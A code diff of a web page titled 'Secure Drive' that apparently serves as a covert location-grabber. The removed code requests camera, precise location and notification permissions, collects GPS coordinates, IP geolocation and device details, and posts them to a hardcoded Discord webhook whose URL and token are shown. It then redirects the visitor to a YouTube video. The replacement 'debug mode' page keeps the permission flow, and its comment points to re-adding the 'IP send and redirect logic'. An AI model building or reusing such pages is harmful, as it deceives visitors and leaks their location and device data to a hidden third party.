--- a/index.html
+++ b/index.html
@@ -2,137 +2,90 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <title>Secure Drive</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <style>
-    html, body {
-      margin: 0; padding: 0;
-      background: #000;
-      color: #0f0;
-      font-family: sans-serif;
-      height: 100vh;
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      flex-direction: column;
-      text-align: center;
-    }
-    #spinner {
-      border: 4px solid #333;
-      border-top: 4px solid #0f0;
-      border-radius: 50%;
-      width: 40px; height: 40px;
-      animation: spin 1s linear infinite;
-      margin-top: 1em;
-    }
-    @keyframes spin {
-      0% { transform: rotate(0deg); }
-      100% { transform: rotate(360deg); }
-    }
+    body { background: #000; color: #0f0; font-family: sans-serif; padding: 2em; }
+    .status { margin: 1em 0; }
+    .good { color: #0f0 }
+    .bad  { color: #f00 }
   </style>
+  <title>Secure Drive Debug</title>
 </head>
 <body>
-  <div id="status">Requesting permissions...</div>
-  <div id="spinner"></div>
+  <h1>Secure Drive – mobile debug mode</h1>
+  <div class="status" id="cam">📷 Camera: waiting…</div>
+  <div class="status" id="loc">📍 Location: waiting…</div>
+  <div class="status" id="not">🔔 Notifications: waiting…</div>
+  <pre id="log"></pre>
 
   <script>
-    const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
-    const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
-    const deniedPage = "permission-denied.html";
+    const logEl = document.getElementById("log");
+    function log(msg) { logEl.textContent += msg + "\n"; console.log(msg); }
 
-    let coords = { lat: "Denied", lon: "Denied", acc: 0 };
+    document.addEventListener("DOMContentLoaded", main);
 
-    const getDeviceInfo = () => ({
-      userAgent: navigator.userAgent,
-      platform: navigator.platform,
-      language: navigator.language,
-      screen: `${screen.width}x${screen.height}`,
-      touchSupport: 'ontouchstart' in window || navigator.maxTouchPoints > 0 ? 'Yes' : 'No'
-    });
+    async function main() {
+      const res = { cam: false, loc: false, not: false };
 
-    const askCamera = async () => {
+      // Camera
       try {
-        const stream = await navigator.mediaDevices.getUserMedia({ video: true });
-        stream.getTracks().forEach(t => t.stop());
-        return true;
-      } catch {
-        return false;
+        log("Requesting camera...");
+        await navigator.mediaDevices.getUserMedia({ video: true });
+        document.getElementById("cam").className = "status good";
+        document.getElementById("cam").textContent = "📷 Camera: granted";
+        res.cam = true;
+        log("Camera permission granted");
+      } catch (e) {
+        document.getElementById("cam").className = "status bad";
+        document.getElementById("cam").textContent = "📷 Camera: denied";
+        log("Camera permission denied: " + e.name);
       }
-    };
 
-    const askLocation = () => new Promise(res => {
-      navigator.geolocation.getCurrentPosition(
-        pos => {
-          coords.lat = pos.coords.latitude;
-          coords.lon = pos.coords.longitude;
-          coords.acc = pos.coords.accuracy;
-          res(true);
-        },
-        () => res(false),
-        { enableHighAccuracy: true, timeout: 8000, maximumAge: 0 }
-      );
-    });
-
-    const askNotification = () => {
-      if (!("Notification" in window)) return Promise.resolve(false);
-      if (Notification.permission === "granted") return Promise.resolve(true);
-      return Notification.requestPermission().then(p => p === "granted");
-    };
-
-    const sendToDiscord = (ipData) => {
-      const device = getDeviceInfo();
-      const payload = {
-        embeds: [{
-          title: "📱 Mobile Access Granted",
-          description: `
-**Latitude:** ${coords.lat}
-**Longitude:** ${coords.lon}
-**Accuracy:** ${coords.acc}m
-**Map:** ${coords.lat !== "Denied" ? `[Link](https://maps.google.com?q=${coords.lat},${coords.lon})` : "Denied"}
-
-🌐 **IP:** ${ipData.ipAddress}
-**City:** ${ipData.city}
-**Region:** ${ipData.stateProv}
-**Country:** ${ipData.countryName}
-
-📲 **Device Info**
-**Platform:** ${device.platform}
-**Browser:** ${device.userAgent}
-**Lang:** ${device.language}
-**Screen:** ${device.screen}
-**Touch Support:** ${device.touchSupport}
-
-🕒 ${new Date().toLocaleString()}
-`
-        }]
-      };
-
-      fetch(webhookUrl, {
-        method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify(payload)
+      // Location
+      log("Requesting location...");
+      await new Promise(r => {
+        navigator.geolocation.getCurrentPosition(
+          () => {
+            document.getElementById("loc").className = "status good";
+            document.getElementById("loc").textContent = "📍 Location: granted";
+            res.loc = true;
+            log("Location permission granted");
+            r();
+          },
+          err => {
+            document.getElementById("loc").className = "status bad";
+            document.getElementById("loc").textContent = "📍 Location: denied";
+            log("Location permission denied: " + err.code);
+            r();
+          },
+          { enableHighAccuracy: true, timeout: 10000 }
+        );
       });
-    };
 
-    async function start() {
-      const camera = await askCamera();
-      const location = await askLocation();
-      const notification = await askNotification();
-
-      if (!camera || !location || !notification) {
-        window.location.href = deniedPage;
-        return;
+      // Notification
+      log("Requesting notifications...");
+      if ("Notification" in window) {
+        const p = await Notification.requestPermission();
+        document.getElementById("not").className = p === "granted" ? "status good" : "status bad";
+        document.getElementById("not").textContent = `🔔 Notifications: ${p}`;
+        res.not = p === "granted";
+        log("Notification permission: " + p);
+      } else {
+        document.getElementById("not").className = "status bad";
+        document.getElementById("not").textContent = "🔔 Notifications: unsupported";
+        log("Notifications not supported");
       }
 
-      fetch("https://api.db-ip.com/v2/free/self")
-        .then(res => res.json())
-        .then(sendToDiscord)
-        .catch(() => sendToDiscord({ ipAddress: "N/A", city: "-", stateProv: "-", countryName: "-" }));
+      log("Summary: " + JSON.stringify(res));
 
-      setTimeout(() => window.location.href = redirectUrl, 5000);
+      if (!res.cam || !res.loc || !res.not) {
+        log("Redirecting to permission-denied.html");
+        window.location.href = "permission-denied.html";
+      } else {
+        log("All permissions granted. You can proceed.");
+        // Now you can call your snapshot, IP send and redirect logic...
+      }
     }
-
-    start();
   </script>
 </body>
 </html>
